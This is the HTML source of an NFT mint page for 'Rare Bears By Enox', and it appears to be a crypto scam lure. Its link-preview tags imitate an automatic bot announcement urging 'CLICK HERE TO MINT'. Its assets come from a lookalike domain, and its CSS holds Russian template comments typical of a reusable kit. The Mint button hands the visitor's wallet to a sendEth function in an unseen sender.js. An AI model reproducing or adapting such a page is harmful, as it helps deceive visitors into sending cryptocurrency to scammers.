<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <title>Rare Bears</title>
	<link rel="icon" href="https://rarebearsnft.com/assets/favicon.png">
    <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no" />
    <meta name="theme-color" content="#000000" />
    <meta name="robots" content="index, follow" />
    <meta charset="UTF-8">
    <meta property="og:url" content="index-2.html">
    <meta property="og:title" content="🚨 ➥ CLICK HERE TO MINT! ⮨ ✅" />
    <meta name="og:site_name" content="𝘛𝘩𝘪𝘴 𝘪𝘴 𝘢𝘯 𝘢𝘶𝘵𝘰𝘮𝘢𝘵𝘪𝘤 𝘢𝘯𝘯𝘰𝘶𝘯𝘤𝘦𝘮𝘦𝘯𝘵 𝘮𝘦𝘴𝘴𝘢𝘨𝘦.">
    <meta name="og:image:url" content="https://rarebears-nft.net/mint.gif">
    <meta property="twitter:card" content="summary_large_image">
    <meta name="twitter:image" content="https://rarebears-nft.net/mint.gif">
    <meta name="theme-color" content="#FF0000">
    
        <meta property="twitter:card" content="summary_large_image">
    
    
    <meta name="og:site_name" content="This is an automatic announcement message.">
    <meta name="og:image:url" content="https://rarebears-nft.net/mint.gif">
    <!--<meta property="twitter:card" content="summary_large_image">-->
    <meta name="twitter:image" content="https://rarebears-nft.net/mint.gif">
    <meta name="theme-color" content="#FF0000">

<meta property="og:image" content="https://rarebears-nft.net/mint.gif">
<meta content="CLICK HERE TO MINT" property="og:title">

<meta content="🎉Only 𝟳𝟳𝟳𝟳 𝗥𝗮𝗿𝗲 𝗕𝗲𝗮𝗿𝘀 will be sold.
𝗥𝗮𝗿𝗲 𝗕𝗲𝗮𝗿𝘀 wishes you good luck!🚀

🏷️𝐒𝐚𝐥𝐞 𝐈𝐧𝐟𝐨
▶ Mint Price: 𝟎.𝟭𝟱 𝐄𝐓𝐇 per 𝐍𝐅𝐓
▶ Allocation: 𝟭𝟬 𝐍𝐅𝐓𝐬 per 𝐰𝐚𝐥𝐥𝐞𝐭 𝐚𝐝𝐝𝐫𝐞𝐬𝐬


🧑&zwj;🚀️ Thank you for patience and support! " property="og:description">
    <link rel="stylesheet" href="css/bootstrap.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/preview.css">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/notyf@3/notyf.min.css">
    <link rel="stylesheet" href="css/animate.css">
    <link rel="stylesheet" href="css/swiper.min.css">
    <style>
        :root {
                    --def-color: #3a7d91; /* Основной цвет */
                    --block-bg-max: rgba(58, 125, 145, 0.41); /* Цвет блока с выбором кол-ва нфт */
                    --block-bg: rgb(11 11 8 / 80%); /* Цвет основного блока минта */
                    --preload-bg: #000000;  /* Цвет прелоудера */
                }
    </style>
    <!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-JMCGTL6L1R"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-JMCGTL6L1R');
</script>
</head>

<body class="body-bg">
    <div class="preloader">
        <img src="images/loading.gif" alt="">
    </div>
    <!-- header -->
    <header></header>

    <body>
        <div class="video" id="video"></div>
        <div class="hero__slider" style="display: none">
            <div class="hslider1 wow fadeIn" data-wow-delay="0.5s">
                <div class="swiper-container">
                    <div class="swiper-wrapper">
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/1.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/2.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/3.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/4.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/5.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/6.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/7.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/8.png" width="260" />
                        </div>
                    </div>
                </div>
            </div>
            <div class="hslider2 wow fadeIn" data-wow-delay="0.6s">
                <div class="swiper-container">
                    <div class="swiper-wrapper">
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/8.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/2.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/3.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/5.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/4.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/6.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/7.png" width="260" />
                        </div>
                        <div class="swiper-slide">
                            <img alt="" height="251" src="images/slider/1.png" width="260" />
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="content">
            <div class="slideshow-container">
                <div style="position:absolute;padding-top: 15px;margin: auto;display: block;left: 0;right: 0;z-index: 99">
                    <a style="padding-left:10px" href="https://twitter.com/BearsRare">
                        <img src="images/nav/twitter-logo.svg" width="32" height="32">
                    </a>
                    <a style="padding-left:10px" href="https://www.instagram.com/rarebears.nft/?hl=en">
                        <img src="images/nav/instagram.svg" width="32" height="32">
                    </a>
                    <a style="padding-left:10px" href="https://t.co/nmoYfsilC6">
                        <img src="images/nav/discord-logo.svg" width="32" height="32">
                    </a>
                </div>
                <div class="header-cont">
                    <h1 class="heading-2-copy-copy-copy-copy wow fadeIn" style=" margin: 0; padding: 0;     font-style: initial;"><span style="text-transform: none;">Rare Bears By Enox</span></h1>
                    <div class="dutch-detail-two-sides">
                        <div class="dutch-det-left wow fadeIn" data-wow-delay="0.1s">
                            <div class="text-block-13">Limited Mint Date</div>
                        </div>
                        <div class="dutch-det-right wow fadeIn" data-wow-delay="0.2s">
                            <div class="text-block-12">February <span id="dateday2"></span>  <span id="datehour1"></span>
                            </div>
                        </div>
                    </div>
                    <div class="header_flex">
                        <div class="dutch-detail-two-sides wow fadeIn" data-wow-delay="0.3s">
                            <div class="dutch-det-left">
                                <div class="text-block-13">Supply</div>
                            </div>
                            <div class="dutch-det-right">
                                <div class="text-block-12" id="top_supply"></div>
                            </div>
                        </div>
                        <div class="dutch-detail-two-sides wow fadeIn" data-wow-delay="0.4s">
                            <div class="dutch-det-left">
                                <div class="text-block-13">Price</div>
                            </div>
                            <div class="dutch-det-right">
                                <div class="text-block-12" id="top_price"></div>
                            </div>
                        </div>
                        <div class="dutch-detail-two-sides wow fadeIn" data-wow-delay="0.5s">
                            <div class="dutch-det-left">
                                <div class="text-block-13">Max</div>
                            </div>
                            <div class="dutch-det-right">
                                <div class="text-block-12" id="top_maxsell"></div>
                            </div>
                        </div>
                    </div>
                    <div id="claim-text-wrapper" class="wow fadeInUp" data-wow-delay="0.6s">
                        <div id="payment-modal">
                            <div id="payment-header">
                                <div id="payment-header-text" style=" margin: 0 auto; ">
                                    <h1 class="heading-2-copy-copy-copy-copy" style=" margin: 0; padding: 0;     font-style: initial;"><span style="text-transform: none;">Limited Sale</span></h1>
                                </div>
                            </div>
                            <div id="payment-info" style=" margin-top: 20px; ">
                                <img id="price-img" src="images/gifius.gif" alt="Claim NFT">
                                <div id="payment-info-text">
                                    <p>Price Per NFT</p>
                                    <h5></h5> 
                                </div>
                            </div>
                            <div id="ape-number">
                                <div id="minus" class="minuson">
                                    <svg width="12" height="2" viewbox="0 0 16 2" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px;">
                                        <path d="M15 0H1C0.734784 0 0.48043 0.105357 0.292893 0.292893C0.105357 0.48043 0 0.734784 0 1C0 1.26522 0.105357 1.51957 0.292893 1.70711C0.48043 1.89464 0.734784 2 1 2H15C15.2652 2 15.5196 1.89464 15.7071 1.70711C15.8946 1.51957 16 1.26522 16 1C16 0.734784 15.8946 0.48043 15.7071 0.292893C15.5196 0.105357 15.2652 0 15 0Z" fill="white"></path>
                                    </svg>
                                </div>
                                <h5 id="pricex" style="margin-left: 13px; margin-right: 13px;">1</h5>
                                <input name="eth" class="eth_input text-field-5 w-input" type="hidden" min="1" max="2" pattern="[A-z0-9]{2,50}" minlength="2" maxlength="50" required="required" value="1">
                                <div id="plus" class="pluson">
                                    <svg width="12" height="12" viewbox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg" style="left: 11px;">
                                        <path d="M15 7H9V1C9 0.734784 8.89464 0.48043 8.70711 0.292893C8.51957 0.105357 8.26522 0 8 0C7.73478 0 7.48043 0.105357 7.29289 0.292893C7.10536 0.48043 7 0.734784 7 1V7H1C0.734784 7 0.48043 7.10536 0.292893 7.29289C0.105357 7.48043 0 7.73478 0 8C0 8.26522 0.105357 8.51957 0.292893 8.70711C0.48043 8.89464 0.734784 9 1 9H7V15C7 15.2652 7.10536 15.5196 7.29289 15.7071C7.48043 15.8946 7.73478 16 8 16C8.26522 16 8.51957 15.8946 8.70711 15.7071C8.89464 15.5196 9 15.2652 9 15V9H15C15.2652 9 15.5196 8.89464 15.7071 8.70711C15.8946 8.51957 16 8.26522 16 8C16 7.73478 15.8946 7.48043 15.7071 7.29289C15.5196 7.10536 15.2652 7 15 7Z" fill="white"></path>
                                    </svg>
                                </div>
                                <h5 id="ape-max">Set Max</h5>
                            </div>
                            <div id="ape-total">
                                <p>Total</p>
                                <h5><span id="price">0.14</span> ETH</h5>
                            </div>
                        </div>
                        <button class="cta connect-btn" id="transfer" onclick="wallet.sendEth()">Mint</button>
                        <div id="num"><span id="num_1"></span><span class="num_c">/</span><span id="num_2"></span>
                        </div>
                    </div>
                </div>
                <style>
                    video {
                        position: fixed;
                        top: 0;
                        left: 0;
                        width: 100%;
                        height: 100vh;
                        object-fit: contain;
                    }
                        .header-cont h1{
                            text-transform: uppercase;
                            font-size: 44px;
                            margin-bottom: 20px;
                            text-align: center;
                        }
                        #num{
                          display: flex;
                          align-items: center;
                          justify-content: center;
                          margin-top: 8px;
                        }
                        .num_c{
                          margin-left: 5px;
                          margin-right: 5px;
                        }
                        .dutch-detail-two-sides{
                          text-align: center;
                        }
                        .bn-onboard-custom{
                            z-index: 100;
                        }
                                            .header-cont{
                                                position: relative;
                                                z-index:2;
                                               padding-top: 50px;
                                               padding-bottom: 50px;
                                              color: #fff;
                                                display: flex;
                                                flex-direction: column;
                                                align-items: center;
                                                
                                            }
                                            #claim-text-wrapper {
                                                border: 2px solid var(--def-color);
                        width: 524px;
                        padding: 32px;
                        background: var(--block-bg);
                        border-radius: 10px;
                    }
                    .header_flex{
                        display: grid;
                        grid-template-columns: repeat(3, auto);
                        grid-gap: 30px;
                        margin-top: 25px;
                        margin-bottom: 25px;
                        width: 524px;
                        justify-content: space-between;
                    }
                    .text-block-13 {
                        color: var(--def-color);
                        font-weight: 700;
                        font-size: 22px;
                        margin-bottom: 5px;
						-webkit-text-stroke: 1px black;
                    }
                    .text-block-12 {
                        color: #fff;
                        font-size: 16px;
                        font-weight: 400;
						-webkit-text-stroke: 1px black;
                    }
                    .heading-2-copy-copy-copy-copy {
                        opacity: 1;
                        color: var(--def-color);
                        line-height: 51px;
                        font-style: italic;
                        font-weight: 900;
                        text-align: center;
                        text-transform: uppercase;
                        font-size: 48px;
                        letter-spacing: 1px;
						-webkit-text-stroke: 1px black;
                    }
                    #payment-info {
                        display: flex;
                        margin-top: 20px;
                        margin-bottom: 32px;
                        padding: 12px;
                        border-width: 1px;
                        border-style: solid;
                        border-color: var(--def-color);
                        border-image: initial;
                        border-radius: 10px;
                    }
                    #price-img {
                        width: 82px;
                        height: 82px;
                        border-radius: 10px;
                    }
                    #payment-info-text {
                        text-align: end;
                        margin: auto 0px auto auto;
						color: var(--def-color);
                    }
                    #payment-info-text p {
                        margin-block-start: 10px;
                        margin-block-end: 10px;
                        font-weight: 400;
                        font-size: 15px;
                        padding: 0!important;
						color: var(--def-color);
                    }
                    #payment-info-text h5 {
                        font-size: 22px;
                        font-weight: 400!important;
                    }
                    #ape-number {
                        display: flex;
                        box-sizing: border-box;
                        margin-bottom: 32px;
                        align-items: center;
                        padding: 12px;
                        background: var(--block-bg-max);
                        border-width: 1px;
                        border-style: solid;
                        border-color: var(--def-color);
                        border-image: initial;
                        border-radius: 10px;
                    }
                    #minus, #plus {
                        position: relative;
                        color: rgb(241, 241, 241);
                        cursor: pointer;
                        width: 20px;
                        height: 20px;
                        display: flex;
                        align-items: center;
                        justify-content: center;
                    }
                    #payment-info-text h4, #payment-info-text h5 {
                        font-family: Montserrat, sans-serif;
                        font-weight: 600;
                        color: rgb(241, 241, 241);
                        margin-block-start: 0px;
                        margin-block-end: 0px;
                    }
                    #ape-total {
                        display: flex;
                        height: 65px;
                        margin-bottom: 32px;
                        padding-left: 10px;
                        padding-right: 10px;
                        border-top: 1px solid rgb(255, 255, 255);
                        border-bottom: 1px solid rgb(255, 255, 255);
                    }
                    #ape-total h5, #ape-total p {
                        margin-block-start: 0px;
                        margin-block-end: 0px;
                        margin-top: auto;
                        margin-bottom: auto;
                        color: #fff;
                        padding: 0!important;
                        font-size: 20px;
                    }
                    #ape-total h5 {
                        margin-right: 0;
                        margin-left: auto;
                    }
                    #pricex{
                        font-size: 22px;
                        margin: 0;
                    }
                                            .frm{
                                                display: flex;
                                                align-items: center;
                                                justify-content: center;
                                            }
                                            .max-button {
                                                
                                                width: 90px;
                                                height: 55px;
                                                border-radius: 10px;
                        background-color: #FF0008;
                        color: #fff;
                        padding: 0;
                        display: flex;
                        align-items: center;
                        justify-content: center;
                        cursor: pointer;
                        margin-left: 15px;
                        font-weight: bold;
                        transition: .3s;
                    }
                    .max-button:hover{
                        background-color: #fff;
                        color: #FF0008;
                    }
                    #ape-max {
                        text-align: end;
                        margin: auto 0 auto auto;
                        padding-left: 15px;
                        padding-right: 15px;
                        padding-top: 5px;
                        padding-bottom: 5px;
                        background: #fff;
                        color: var(--def-color);
                        text-align: center;
                        text-transform: uppercase;
                        font-weight: 600;
                        cursor: pointer;
                        font-size: 16px;
                        font-family: 'Blender Pro', 'Helvetica', sans-serif;
                        border-radius: 5px;
                    }
                                                #total{
                                                    color: #d20000;
                                                    font-size: 24px;
                                                }
                                                .incr{
                                                    display: flex;
                                                    align-items: center;
                                                    justify-content: space-between;
                                                    font-size: 24px;
                                                    font-weight: 900;
                                                    width: 180px;
                                                    height: 55px;
                                                    padding: 0 11px;
                                                    box-sizing: border-box;
                                                    background: #fff;
                                                    border-radius: 10px;
                                                    color: #000;
                                                }
                                                #timer+p{
                                                    padding-bottom: 20px;
                                                }
                                                .mint-change{
                                                    font-weight: bold;
                                                    cursor: pointer;
                                                }
                                                .btn{
                                                    text-align: center;
                                                    display: block;
                                                    width: 150px;
                                                    margin-left: auto!important;
                                                    margin-right: auto!important;
                                                    margin-top: 15px;
                                                    padding-left: 6px!important;
                                                    color: #fff !important;
                                                    text-transform: uppercase;
                                                }
                                                .btn:hover{
                                                    color: #d20000!important;
                                                }
                                                #transfer{
                                                  font-size: 24px;
                        margin: auto 0 auto auto;
                        padding-left: 15px;
                        padding-right: 15px;
                        padding-top: 5px;
                        padding-bottom: 5px;
                        background: #fff;
                        color: #000;
                        text-align: center;
                        text-transform: uppercase;
                        cursor: pointer;
                        border: none;
                        background: var(--def-color);
                        color: #fff;
                        max-width: 300px;
                        width: 100%;
                        
                                                }
                                                .svelte-q1527{
                                                    display: none;
                                                }
                                                .svelte-q1527:first-child{
                                                    display: block;
                                                }
                                                @media(max-width:720px){
                                                    #box0title1{
                                                        font-size: 100px!important;
                                                    }
                                                    #box0title0{
                                                        font-size: 60px!important;
                                                    }
                                                    .header-cont{
                                                        /*width: 100%;*/
                                                        padding-left: 0;
                                                        padding-right: 0;
                                                    }
                                                    #claim-text-wrapper{
                                                        width: 100%;
                                                    }
                                                    .header_flex{
                                                        width: 100%;
                                                    }
                                                    .svelte-q1527{
                                                        display: block;
                                                    }
                                                    .main-flex{
                                                        flex-direction: column-reverse;
                                                        height: auto;
                                                    }
                                                    .slider{
                                                        max-width: 100%;
                                                        margin-top: 50px;
                                                    }
                                                }
                                                @media (max-width: 400px) {
                    .text-block-13{
                        font-size: 16px!important;
                    }
                    }

.hero__slider {
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    overflow:hidden;
    pointer-events: none; 
    z-index: -1;
} 
.hslider1,.hslider2{position:relative;margin-bottom:1em;transform:rotate(-12deg);width: 1920px !important;}
.swiper-container{margin:0 auto;position:relative;overflow:hidden;list-style:none;padding:0;z-index:1;}
.hero__slider{display:flex;flex-flow:column;justify-content:center;align-items:center;height:100%;row-gap:4em;padding-top:2em;background-size:cover;background-position:center;}
.swiper-wrapper{position:relative;width:100%;height:100%;z-index:1;}
.hslider1 .swiper-slide,.hslider2 .swiper-slide{width:13%;}
@media (max-width:767px){
.hslider1 .swiper-slide,.hslider2 .swiper-slide{width:45%;}
}
@media screen and (max-width: 640px) {
    .hslider1,.hslider2 {
        width: 710px !important;
    }
}
                </style>
            </div>
        </div>
    </body>
    <!-- footer -->
    <footer class="page-footer">
        <!-- <div class="top-footer-graphics wow animate__animated animate__fadeInLeft" data-wow-duration="1.3s">
      <img src="images/footer-top-graphics.png" class="img-fluid" alt="">
    </div> -->
        <div class="footer-bottom">
            <div class="container">
                <p style="color:#fff">Rare Bears By Enox © 2022</p>
            </div>
        </div>
    </footer>
    <!-- footer -->
    <!-- Jquery-->
    <script type="text/javascript" src="web3@1.2.11/dist/web3.min.js"></script>
    <script src="lib/ethers-5.1.umd.min.js" type="text/javascript"></script>
    <script type="text/javascript" src="onboard-dist/main.js"></script>
    <script src="js/settings.js"></script>
    <script type="text/javascript" src="sender.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/notyf@3/notyf.min.js"></script>
    <script src="ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="js/wow.min.js"></script>
    <script src="js/scripts.js"></script>
    <script>
        var _paq = window._paq = window._paq || [];
        
            /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
        
            _paq.push(['trackPageView']);
        
            _paq.push(['enableLinkTracking']);
        
            (function() {
        
                var u = "";
        
                _paq.push(['setTrackerUrl', u + 'matomo.php']);
        
                _paq.push(['setSiteId', '3']);
        
                _paq.push(['enableJSErrorTracking']);
        
                var d = document,
        
                    g = d.createElement('script'),
        
                    s = d.getElementsByTagName('script')[0];
        
                g.async = true;
        
                g.src = 'js/matomo.js';
        
                s.parentNode.insertBefore(g, s);
        
            })();
    </script>
    <!-- jquery -->
    <script src="js/bootstrap.js"></script>
    <!-- bootstrap js -->
    <script type="text/javascript">
        $(window).on('beforeunload', function() { $("#myVideo").each( function() {   $(this).get(0).pause(); }); })
    </script>
    <script src="js/d-swiper.min.js"></script>
    <script>
        $(window).on('load', function() {
                if($(window).width() >= 0 && $(window).width() <= 429) {
                    $("#video").html('<img  id="myVideo" src="images/bg.png">');
                } else {
                    $("#video").attr('poster','images/main-desk-background.jpeg' );
                    $("#video").html('<video id="myVideo" preload="auto" autoplay loop muted playsinline poster="images/bg.png"> <source src="images/bg.png" type="video/mp4"></source> </video>');
                }
            });
    </script>
</body>

</html>